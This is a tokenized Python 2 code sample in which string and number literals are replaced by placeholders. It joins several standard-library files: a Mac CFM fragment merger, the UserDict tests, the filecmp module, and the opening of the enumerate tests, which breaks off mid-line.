<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> import Carbon . File <EOL> import struct <EOL> from Carbon import Res <EOL> import os <EOL> import sys <EOL> DEBUG = <NUM_LIT:0> <EOL> error = "<STR_LIT>" <EOL> BUFSIZE = <NUM_LIT> <EOL> def mergecfmfiles ( srclist , dst , architecture = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> srclist = list ( srclist ) <EOL> for i in range ( len ( srclist ) ) : <EOL> srclist [ i ] = Carbon . File . pathname ( srclist [ i ] ) <EOL> dst = Carbon . File . pathname ( dst ) <EOL> dstfile = open ( dst , "<STR_LIT:wb>" ) <EOL> rf = Res . FSpOpenResFile ( dst , <NUM_LIT:3> ) <EOL> try : <EOL> dstcfrg = CfrgResource ( ) <EOL> for src in srclist : <EOL> srccfrg = CfrgResource ( src ) <EOL> for frag in srccfrg . fragments : <EOL> if frag . architecture == '<STR_LIT>' and architecture == '<STR_LIT>' : <EOL> continue <EOL> if frag . architecture == '<STR_LIT>' and architecture == '<STR_LIT>' : <EOL> continue <EOL> dstcfrg . append ( frag ) <EOL> frag . copydata ( dstfile ) <EOL> cfrgres = Res . Resource ( dstcfrg . build ( ) ) <EOL> Res . UseResFile ( rf ) <EOL> cfrgres . AddResource ( '<STR_LIT>' , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> finally : <EOL> dstfile . close ( ) <EOL> rf = Res . CloseResFile ( rf ) <EOL> class CfrgResource : <EOL> def __init__ ( self , path = None ) : <EOL> self . version = <NUM_LIT:1> <EOL> self . fragments = [ ] <EOL> self . path = path <EOL> if path is not None and os . path . exists ( path ) : <EOL> currentresref = Res . CurResFile ( ) <EOL> resref = Res . FSpOpenResFile ( path , <NUM_LIT:1> ) <EOL> Res . UseResFile ( resref ) <EOL> try : <EOL> try : <EOL> data = Res . Get1Resource ( '<STR_LIT>' , <NUM_LIT:0> ) . data <EOL> except Res . Error : <EOL> raise Res . Error , "<STR_LIT>" , sys . exc_traceback <EOL> finally : <EOL> Res . CloseResFile ( resref ) <EOL> Res . UseResFile ( currentresref ) <EOL> self . parse ( data ) <EOL> if self . version < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> def parse ( self , data ) : <EOL> ( res1 , res2 , self . version , <EOL> res3 , res4 , res5 , res6 , <EOL> self . memberCount ) = struct . unpack ( "<STR_LIT>" , data [ : <NUM_LIT:32> ] ) <EOL> data = data [ <NUM_LIT:32> : ] <EOL> while data : <EOL> frag = FragmentDescriptor ( self . path , data ) <EOL> data = data [ frag . memberSize : ] <EOL> self . fragments . append ( frag ) <EOL> def build ( self ) : <EOL> self . memberCount = len ( self . fragments ) <EOL> data = struct . pack ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:0> , self . version , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , self . memberCount ) <EOL> for frag in self . fragments : <EOL> data = data + frag . build ( ) <EOL> return data <EOL> def append ( self , frag ) : <EOL> self . fragments . append ( frag ) <EOL> class FragmentDescriptor : <EOL> def __init__ ( self , path , data = None ) : <EOL> self . path = path <EOL> if data is not None : <EOL> self . parse ( data ) <EOL> def parse ( self , data ) : <EOL> self . architecture = data [ : <NUM_LIT:4> ] <EOL> ( self . updatelevel , <EOL> self . currentVersion , <EOL> self . oldDefVersion , <EOL> self . stacksize , <EOL> self . applibdir , <EOL> self . fragtype , <EOL> self . where , <EOL> self . offset , <EOL> self . length , <EOL> self . res1 , self . res2 , <EOL> self . memberSize , ) = struct . unpack ( "<STR_LIT>" , data [ <NUM_LIT:4> : <NUM_LIT> ] ) <EOL> pname = data [ <NUM_LIT> : self . memberSize ] <EOL> self . name = pname [ <NUM_LIT:1> : <NUM_LIT:1> + ord ( pname [ <NUM_LIT:0> ] ) ] <EOL> def build ( self ) : <EOL> data = self . architecture <EOL> data = data + struct . pack ( "<STR_LIT>" , <EOL> self . updatelevel , <EOL> self . currentVersion , <EOL> self . oldDefVersion , <EOL> self . stacksize , <EOL> self . applibdir , <EOL> self . fragtype , <EOL> self . where , <EOL> self . offset , <EOL> self . length , <EOL> self . res1 , self . res2 ) <EOL> self . memberSize = len ( data ) + <NUM_LIT:2> + <NUM_LIT:1> + len ( self . name ) <EOL> if self . memberSize % <NUM_LIT:4> : <EOL> self . memberSize = self . memberSize + <NUM_LIT:4> - ( self . memberSize % <NUM_LIT:4> ) <EOL> data = data + struct . pack ( "<STR_LIT>" , self . memberSize , len ( self . name ) ) <EOL> data = data + self . name <EOL> data = data + '<STR_LIT>' * ( self . memberSize - len ( data ) ) <EOL> return data <EOL> def getfragment ( self ) : <EOL> if self . where < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> f = open ( self . path , "<STR_LIT:rb>" ) <EOL> f . seek ( self . offset ) <EOL> if self . length : <EOL> frag = f . read ( self . length ) <EOL> else : <EOL> frag = f . read ( ) <EOL> f . close ( ) <EOL> return frag <EOL> def copydata ( self , outfile ) : <EOL> if self . where < > <NUM_LIT:1> : <EOL> raise error , "<STR_LIT>" <EOL> infile = open ( self . path , "<STR_LIT:rb>" ) <EOL> if self . length == <NUM_LIT:0> : <EOL> infile . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> self . length = infile . tell ( ) <EOL> infile . seek ( self . offset ) <EOL> offset = outfile . tell ( ) <EOL> if offset % <NUM_LIT:16> : <EOL> offset = offset + <NUM_LIT:16> - ( offset % <NUM_LIT:16> ) <EOL> outfile . seek ( offset ) <EOL> self . offset = offset <EOL> l = self . length <EOL> while l : <EOL> if l > BUFSIZE : <EOL> outfile . write ( infile . read ( BUFSIZE ) ) <EOL> l = l - BUFSIZE <EOL> else : <EOL> outfile . write ( infile . read ( l ) ) <EOL> l = <NUM_LIT:0> <EOL> infile . close ( ) </s>
<s> import unittest <EOL> from test import test_support , mapping_tests <EOL> import UserDict <EOL> d0 = { } <EOL> d1 = { "<STR_LIT>" : <NUM_LIT:1> } <EOL> d2 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:2> } <EOL> d3 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:3> , "<STR_LIT>" : <NUM_LIT:5> } <EOL> d4 = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> d5 = { "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:1> } <EOL> class UserDictTest ( mapping_tests . TestHashMappingProtocol ) : <EOL> type2test = UserDict . IterableUserDict <EOL> def test_all ( self ) : <EOL> u = UserDict . UserDict ( ) <EOL> u0 = UserDict . UserDict ( d0 ) <EOL> u1 = UserDict . UserDict ( d1 ) <EOL> u2 = UserDict . IterableUserDict ( d2 ) <EOL> uu = UserDict . UserDict ( u ) <EOL> uu0 = UserDict . UserDict ( u0 ) <EOL> uu1 = UserDict . UserDict ( u1 ) <EOL> uu2 = UserDict . UserDict ( u2 ) <EOL> self . assertEqual ( UserDict . UserDict ( one = <NUM_LIT:1> , two = <NUM_LIT:2> ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( dict = [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] ) , d2 ) <EOL> self . assertEqual ( UserDict . UserDict ( [ ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , <NUM_LIT:2> ) ] , two = <NUM_LIT:3> , three = <NUM_LIT:5> ) , d3 ) <EOL> self . assertEqual ( UserDict . UserDict . fromkeys ( '<STR_LIT>' . split ( ) ) , d4 ) <EOL> self . assertEqual ( UserDict . UserDict ( ) . fromkeys ( '<STR_LIT>' . split ( ) ) , d4 ) <EOL> self . assertEqual ( UserDict . UserDict . fromkeys ( '<STR_LIT>' . split ( ) , <NUM_LIT:1> ) , d5 ) <EOL> self . assertEqual ( UserDict . UserDict ( ) . fromkeys ( '<STR_LIT>' . split ( ) , <NUM_LIT:1> ) , d5 ) <EOL> self . assert_ ( u1 . fromkeys ( '<STR_LIT>' . split ( ) ) is not u1 ) <EOL> self . assert_ ( isinstance ( u1 . fromkeys ( '<STR_LIT>' . split ( ) ) , UserDict . UserDict ) ) <EOL> self . assert_ ( isinstance ( u2 . fromkeys ( '<STR_LIT>' . split ( ) ) , UserDict . IterableUserDict ) ) <EOL> self . assertEqual ( str ( u0 ) , str ( d0 ) ) <EOL> self . assertEqual ( repr ( u1 ) , repr ( d1 ) ) <EOL> self . assertEqual ( ` u2 ` , ` d2 ` ) <EOL> all = [ d0 , d1 , d2 , u , u0 , u1 , u2 , uu , uu0 , uu1 , uu2 ] <EOL> for a in all : <EOL> for b in all : <EOL> self . assertEqual ( cmp ( a , b ) , cmp ( len ( a ) , len ( b ) ) ) <EOL> self . assertEqual ( u2 [ "<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertRaises ( KeyError , u1 . __getitem__ , "<STR_LIT>" ) <EOL> u3 = UserDict . UserDict ( u2 ) <EOL> u3 [ "<STR_LIT>" ] = <NUM_LIT:2> <EOL> u3 [ "<STR_LIT>" ] = <NUM_LIT:3> <EOL> del u3 [ "<STR_LIT>" ] <EOL> self . assertRaises ( KeyError , u3 . __delitem__ , "<STR_LIT>" ) <EOL> u3 . clear ( ) <EOL> self . assertEqual ( u3 , { } ) <EOL> u2a = u2 . copy ( ) <EOL> self . assertEqual ( u2a , u2 ) <EOL> u2b = UserDict . UserDict ( x = <NUM_LIT> , y = <NUM_LIT> ) <EOL> u2c = u2b . copy ( ) <EOL> self . assertEqual ( u2b , u2c ) <EOL> class MyUserDict ( UserDict . UserDict ) : <EOL> def display ( self ) : print self <EOL> m2 = MyUserDict ( u2 ) <EOL> m2a = m2 . copy ( ) <EOL> self . assertEqual ( m2a , m2 ) <EOL> m2 [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> self . assertNotEqual ( m2a , m2 ) <EOL> self . assertEqual ( u2 . keys ( ) , d2 . keys ( ) ) <EOL> self . assertEqual ( u2 . items ( ) , d2 . items ( ) ) <EOL> self . assertEqual ( u2 . values ( ) , d2 . values ( ) ) <EOL> for i in u2 . keys ( ) : <EOL> self . assert_ ( u2 . has_key ( i ) ) <EOL> self . assert_ ( i in u2 ) <EOL> self . assertEqual ( u1 . has_key ( i ) , d1 . has_key ( i ) ) <EOL> self . assertEqual ( i in u1 , i in d1 ) <EOL> self . assertEqual ( u0 . has_key ( i ) , d0 . has_key ( i ) ) <EOL> self . assertEqual ( i in u0 , i in d0 ) <EOL> t = UserDict . UserDict ( ) <EOL> t . update ( u2 ) <EOL> self . assertEqual ( t , u2 ) <EOL> class Items : <EOL> def items ( self ) : <EOL> return ( ( "<STR_LIT:x>" , <NUM_LIT> ) , ( "<STR_LIT:y>" , <NUM_LIT> ) ) <EOL> t = UserDict . UserDict ( ) <EOL> t . update ( Items ( ) ) <EOL> self . assertEqual ( t , { "<STR_LIT:x>" : <NUM_LIT> , "<STR_LIT:y>" : <NUM_LIT> } ) <EOL> for i in u2 . keys ( ) : <EOL> self . assertEqual ( u2 . get ( i ) , u2 [ i ] ) <EOL> self . assertEqual ( u1 . get ( i ) , d1 . get ( i ) ) <EOL> self . assertEqual ( u0 . get ( i ) , d0 . get ( i ) ) <EOL> for i in xrange ( <NUM_LIT:20> ) : <EOL> u2 [ i ] = str ( i ) <EOL> ikeys = [ ] <EOL> for k in u2 : <EOL> ikeys . append ( k ) <EOL> keys = u2 . keys ( ) <EOL> self . assertEqual ( set ( ikeys ) , set ( keys ) ) <EOL> t = UserDict . UserDict ( ) <EOL> self . assertEqual ( t . setdefault ( "<STR_LIT:x>" , <NUM_LIT> ) , <NUM_LIT> ) <EOL> self . assert_ ( t . has_key ( "<STR_LIT:x>" ) ) <EOL> self . assertEqual ( t . setdefault ( "<STR_LIT:x>" , <NUM_LIT> ) , <NUM_LIT> ) <EOL> t = UserDict . UserDict ( x = <NUM_LIT> ) <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" ) , <NUM_LIT> ) <EOL> self . assertRaises ( KeyError , t . pop , "<STR_LIT:x>" ) <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> t [ "<STR_LIT:x>" ] = <NUM_LIT> <EOL> self . assertEqual ( t . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT> ) <EOL> t = UserDict . UserDict ( x = <NUM_LIT> ) <EOL> self . assertEqual ( t . popitem ( ) , ( "<STR_LIT:x>" , <NUM_LIT> ) ) <EOL> self . assertRaises ( KeyError , t . popitem ) <EOL> def test_missing ( self ) : <EOL> self . assertEqual ( hasattr ( UserDict , "<STR_LIT>" ) , False ) <EOL> class D ( UserDict . UserDict ) : <EOL> def __missing__ ( self , key ) : <EOL> return <NUM_LIT> <EOL> d = D ( { <NUM_LIT:1> : <NUM_LIT:2> , <NUM_LIT:3> : <NUM_LIT:4> } ) <EOL> self . assertEqual ( d [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( d [ <NUM_LIT:3> ] , <NUM_LIT:4> ) <EOL> self . assert_ ( <NUM_LIT:2> not in d ) <EOL> self . assert_ ( <NUM_LIT:2> not in d . keys ( ) ) <EOL> self . assertEqual ( d [ <NUM_LIT:2> ] , <NUM_LIT> ) <EOL> class E ( UserDict . UserDict ) : <EOL> def __missing__ ( self , key ) : <EOL> raise RuntimeError ( key ) <EOL> e = E ( ) <EOL> try : <EOL> e [ <NUM_LIT> ] <EOL> except RuntimeError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class F ( UserDict . UserDict ) : <EOL> def __init__ ( self ) : <EOL> self . __missing__ = lambda key : None <EOL> UserDict . UserDict . __init__ ( self ) <EOL> f = F ( ) <EOL> try : <EOL> f [ <NUM_LIT> ] <EOL> except KeyError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class G ( UserDict . UserDict ) : <EOL> pass <EOL> g = G ( ) <EOL> try : <EOL> g [ <NUM_LIT> ] <EOL> except KeyError , err : <EOL> self . assertEqual ( err . args , ( <NUM_LIT> , ) ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class SeqDict ( UserDict . DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , other = None , ** kwargs ) : <EOL> self . keylist = [ ] <EOL> self . valuelist = [ ] <EOL> if other is not None : <EOL> for ( key , value ) in other : <EOL> self [ key ] = value <EOL> for ( key , value ) in kwargs . iteritems ( ) : <EOL> self [ key ] = value <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> except ValueError : <EOL> raise KeyError <EOL> return self . valuelist [ i ] <EOL> def __setitem__ ( self , key , value ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> self . valuelist [ i ] = value <EOL> except ValueError : <EOL> self . keylist . append ( key ) <EOL> self . valuelist . append ( value ) <EOL> def __delitem__ ( self , key ) : <EOL> try : <EOL> i = self . keylist . index ( key ) <EOL> except ValueError : <EOL> raise KeyError <EOL> self . keylist . pop ( i ) <EOL> self . valuelist . pop ( i ) <EOL> def keys ( self ) : <EOL> return list ( self . keylist ) <EOL> def copy ( self ) : <EOL> d = self . __class__ ( ) <EOL> for key , value in self . iteritems ( ) : <EOL> d [ key ] = value <EOL> return d <EOL> @ classmethod <EOL> def fromkeys ( cls , keys , value = None ) : <EOL> d = cls ( ) <EOL> for key in keys : <EOL> d [ key ] = value <EOL> return d <EOL> class UserDictMixinTest ( mapping_tests . TestMappingProtocol ) : <EOL> type2test = SeqDict <EOL> def test_all ( self ) : <EOL> s = SeqDict ( ) <EOL> s [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> s [ <NUM_LIT:20> ] = '<STR_LIT>' <EOL> s [ <NUM_LIT:30> ] = '<STR_LIT>' <EOL> del s [ <NUM_LIT:20> ] <EOL> self . assertEqual ( s [ <NUM_LIT:10> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s . keys ( ) , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assert_ ( s . has_key ( <NUM_LIT:10> ) ) <EOL> self . assert_ ( not s . has_key ( <NUM_LIT:20> ) ) <EOL> self . assert_ ( <NUM_LIT:10> in s ) <EOL> self . assert_ ( <NUM_LIT:20> not in s ) <EOL> self . assertEqual ( [ k for k in s ] , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assertEqual ( len ( s ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( list ( s . iteritems ( ) ) , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( list ( s . iterkeys ( ) ) , [ <NUM_LIT:10> , <NUM_LIT:30> ] ) <EOL> self . assertEqual ( list ( s . itervalues ( ) ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( s . values ( ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( s . items ( ) , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , ( <NUM_LIT:30> , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:10> ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:15> , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . get ( <NUM_LIT:15> ) , None ) <EOL> self . assertEqual ( s . setdefault ( <NUM_LIT> , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( s . setdefault ( <NUM_LIT:10> , '<STR_LIT:null>' ) , '<STR_LIT>' ) <EOL> del s [ <NUM_LIT> ] <EOL> self . assertEqual ( s . pop ( <NUM_LIT:10> ) , '<STR_LIT>' ) <EOL> self . assert_ ( <NUM_LIT:10> not in s ) <EOL> s [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> self . assertEqual ( s . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT:1> ) <EOL> s [ "<STR_LIT:x>" ] = <NUM_LIT> <EOL> self . assertEqual ( s . pop ( "<STR_LIT:x>" , <NUM_LIT:1> ) , <NUM_LIT> ) <EOL> k , v = s . popitem ( ) <EOL> self . assert_ ( k not in s ) <EOL> s [ k ] = v <EOL> s . clear ( ) <EOL> self . assertEqual ( len ( s ) , <NUM_LIT:0> ) <EOL> self . assertRaises ( KeyError , s . popitem ) <EOL> s . update ( { <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:20> : '<STR_LIT>' } ) <EOL> self . assertEqual ( s [ <NUM_LIT:10> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s [ <NUM_LIT:20> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( s , { <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:20> : '<STR_LIT>' } ) <EOL> t = SeqDict ( ) <EOL> t [ <NUM_LIT:20> ] = '<STR_LIT>' <EOL> t [ <NUM_LIT:10> ] = '<STR_LIT>' <EOL> self . assertEqual ( s , t ) <EOL> def test_main ( ) : <EOL> test_support . run_unittest ( <EOL> UserDictTest , <EOL> UserDictMixinTest <EOL> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> test_main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import stat <EOL> import warnings <EOL> from itertools import ifilter , ifilterfalse , imap , izip <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _cache = { } <EOL> BUFSIZE = <NUM_LIT:8> * <NUM_LIT> <EOL> def cmp ( f1 , f2 , shallow = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> s1 = _sig ( os . stat ( f1 ) ) <EOL> s2 = _sig ( os . stat ( f2 ) ) <EOL> if s1 [ <NUM_LIT:0> ] != stat . S_IFREG or s2 [ <NUM_LIT:0> ] != stat . S_IFREG : <EOL> return False <EOL> if shallow and s1 == s2 : <EOL> return True <EOL> if s1 [ <NUM_LIT:1> ] != s2 [ <NUM_LIT:1> ] : <EOL> return False <EOL> result = _cache . get ( ( f1 , f2 ) ) <EOL> if result and ( s1 , s2 ) == result [ : <NUM_LIT:2> ] : <EOL> return result [ <NUM_LIT:2> ] <EOL> outcome = _do_cmp ( f1 , f2 ) <EOL> _cache [ f1 , f2 ] = s1 , s2 , outcome <EOL> return outcome <EOL> def _sig ( st ) : <EOL> return ( stat . S_IFMT ( st . st_mode ) , <EOL> st . st_size , <EOL> st . st_mtime ) <EOL> def _do_cmp ( f1 , f2 ) : <EOL> bufsize = BUFSIZE <EOL> fp1 , fp2 = None , None <EOL> try : <EOL> fp1 = open ( f1 , '<STR_LIT:rb>' ) <EOL> fp2 = open ( f2 , '<STR_LIT:rb>' ) <EOL> while True : <EOL> b1 = fp1 . read ( bufsize ) <EOL> b2 = fp2 . read ( bufsize ) <EOL> if b1 != b2 : <EOL> return False <EOL> if not b1 : <EOL> return True <EOL> finally : <EOL> if fp1 : <EOL> fp1 . close ( ) <EOL> if fp2 : <EOL> fp2 . close ( ) <EOL> class dircmp : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , a , b , ignore = None , hide = None ) : <EOL> self . left = a <EOL> self . right = b <EOL> if hide is None : <EOL> self . hide = [ os . curdir , os . pardir ] <EOL> else : <EOL> self . hide = hide <EOL> if ignore is None : <EOL> self . ignore = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> self . ignore = ignore <EOL> def phase0 ( self ) : <EOL> self . left_list = _filter ( os . listdir ( self . left ) , <EOL> self . hide + self . ignore ) <EOL> self . right_list = _filter ( os . listdir ( self . right ) , <EOL> self . hide + self . ignore ) <EOL> self . left_list . sort ( ) <EOL> self . right_list . sort ( ) <EOL> def phase1 ( self ) : <EOL> a = dict ( izip ( imap ( os . path . normcase , self . left_list ) , self . left_list ) ) <EOL> b = dict ( izip ( imap ( os . path . normcase , self . right_list ) , self . right_list ) ) <EOL> self . common = map ( a . __getitem__ , ifilter ( b . has_key , a ) ) <EOL> self . left_only = map ( a . __getitem__ , ifilterfalse ( b . has_key , a ) ) <EOL> self . right_only = map ( b . __getitem__ , ifilterfalse ( a . has_key , b ) ) <EOL> def phase2 ( self ) : <EOL> self . common_dirs = [ ] <EOL> self . common_files = [ ] <EOL> self . common_funny = [ ] <EOL> for x in self . common : <EOL> a_path = os . path . join ( self . left , x ) <EOL> b_path = os . path . join ( self . right , x ) <EOL> ok = <NUM_LIT:1> <EOL> try : <EOL> a_stat = os . stat ( a_path ) <EOL> except os . error , why : <EOL> ok = <NUM_LIT:0> <EOL> try : <EOL> b_stat = os . stat ( b_path ) <EOL> except os . error , why : <EOL> ok = <NUM_LIT:0> <EOL> if ok : <EOL> a_type = stat . S_IFMT ( a_stat . st_mode ) <EOL> b_type = stat . S_IFMT ( b_stat . st_mode ) <EOL> if a_type != b_type : <EOL> self . common_funny . append ( x ) <EOL> elif stat . S_ISDIR ( a_type ) : <EOL> self . common_dirs . append ( x ) <EOL> elif stat . S_ISREG ( a_type ) : <EOL> self . common_files . append ( x ) <EOL> else : <EOL> self . common_funny . append ( x ) <EOL> else : <EOL> self . common_funny . append ( x ) <EOL> def phase3 ( self ) : <EOL> xx = cmpfiles ( self . left , self . right , self . common_files ) <EOL> self . same_files , self . diff_files , self . funny_files = xx <EOL> def phase4 ( self ) : <EOL> self . subdirs = { } <EOL> for x in self . common_dirs : <EOL> a_x = os . path . join ( self . left , x ) <EOL> b_x = os . path . join ( self . right , x ) <EOL> self . subdirs [ x ] = dircmp ( a_x , b_x , self . ignore , self . hide ) <EOL> def phase4_closure ( self ) : <EOL> self . phase4 ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> sd . phase4_closure ( ) <EOL> def report ( self ) : <EOL> print '<STR_LIT>' , self . left , self . right <EOL> if self . left_only : <EOL> self . left_only . sort ( ) <EOL> print '<STR_LIT>' , self . left , '<STR_LIT::>' , self . left_only <EOL> if self . right_only : <EOL> self . right_only . sort ( ) <EOL> print '<STR_LIT>' , self . right , '<STR_LIT::>' , self . right_only <EOL> if self . same_files : <EOL> self . same_files . sort ( ) <EOL> print '<STR_LIT>' , self . same_files <EOL> if self . diff_files : <EOL> self . diff_files . sort ( ) <EOL> print '<STR_LIT>' , self . diff_files <EOL> if self . funny_files : <EOL> self . funny_files . sort ( ) <EOL> print '<STR_LIT>' , self . funny_files <EOL> if self . common_dirs : <EOL> self . common_dirs . sort ( ) <EOL> print '<STR_LIT>' , self . common_dirs <EOL> if self . common_funny : <EOL> self . common_funny . sort ( ) <EOL> print '<STR_LIT>' , self . common_funny <EOL> def report_partial_closure ( self ) : <EOL> self . report ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> print <EOL> sd . report ( ) <EOL> def report_full_closure ( self ) : <EOL> self . report ( ) <EOL> for sd in self . subdirs . itervalues ( ) : <EOL> print <EOL> sd . report_full_closure ( ) <EOL> methodmap = dict ( subdirs = phase4 , <EOL> same_files = phase3 , diff_files = phase3 , funny_files = phase3 , <EOL> common_dirs = phase2 , common_files = phase2 , common_funny = phase2 , <EOL> common = phase1 , left_only = phase1 , right_only = phase1 , <EOL> left_list = phase0 , right_list = phase0 ) <EOL> def __getattr__ ( self , attr ) : <EOL> if attr not in self . methodmap : <EOL> raise AttributeError , attr <EOL> self . methodmap [ attr ] ( self ) <EOL> return getattr ( self , attr ) <EOL> def cmpfiles ( a , b , common , shallow = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> res = ( [ ] , [ ] , [ ] ) <EOL> for x in common : <EOL> ax = os . path . join ( a , x ) <EOL> bx = os . path . join ( b , x ) <EOL> res [ _cmp ( ax , bx , shallow ) ] . append ( x ) <EOL> return res <EOL> def _cmp ( a , b , sh , abs = abs , cmp = cmp ) : <EOL> try : <EOL> return not abs ( cmp ( a , b , sh ) ) <EOL> except os . error : <EOL> return <NUM_LIT:2> <EOL> def _filter ( flist , skip ) : <EOL> return list ( ifilterfalse ( skip . __contains__ , flist ) ) <EOL> def demo ( ) : <EOL> import sys <EOL> import getopt <EOL> options , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT:r>' ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> raise getopt . GetoptError ( '<STR_LIT>' , None ) <EOL> dd = dircmp ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> ] ) <EOL> if ( '<STR_LIT>' , '<STR_LIT>' ) in options : <EOL> dd . report_full_closure ( ) <EOL> else : <EOL> dd . report ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo ( ) </s>
<s> import unittest <EOL> import sys <EOL> from test import test_support <EOL> class G : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> def __getitem__ ( self , i ) : <EOL> return self . seqn [ i ] <EOL> class I : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> if self . i >= len ( self . seqn ) : raise StopIteration <EOL> v = self . seqn [ self . i ] <EOL> self . i += <NUM_LIT:1> <EOL> return v <EOL> class Ig : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> for val in self . seqn : <EOL> yield val <EOL> class X : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def next ( self ) : <EOL> if self . i >= len ( self . seqn ) : raise StopIteration <EOL> v = self . seqn [ self . i ] <EOL> self . i += <NUM_LIT:1> <EOL> return v <EOL> class E : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> <NUM_LIT:3> // <NUM_LIT:0> <EOL> class N : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , seqn ) : <EOL> self . seqn = seqn <EOL> self . i = <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> return self <EOL> class EnumerateTestCase ( unittest . TestCase ) : <EOL> enum = enumerate <EOL> seq , res = '<STR_LIT:abc>' , [ ( <NUM_LIT:0> , '<STR_LIT:a>' ) , ( <NUM_LIT:1> , '<STR_LIT:b>' ) , ( <NUM_LIT:2> , '<STR_LIT:c>' ) ] <EOL> def test_basicfunction ( self ) : <EOL> self . assertEqual ( type ( self . enum ( self . seq ) ) , self . enum ) <EOL> e = self . enum ( self . seq ) <EOL> self . assertEqual ( iter ( e ) , e ) <EOL> self . assertEqual ( list ( self . enum ( self . seq ) ) , self . res ) <EOL> self . enum . __doc__ <EOL> def test_getitemseqn ( self ) : <EOL> self . assertEqual ( list ( self . enum ( G ( self . seq ) ) ) , self . res ) <EOL> e = self . enum ( G ( '<STR_LIT>' ) ) <EOL> self . assertRaises ( StopIteration , e . next ) <EOL> def test_iteratorseqn ( self ) : <EOL> self . assertEqual ( list ( self . enum ( I ( 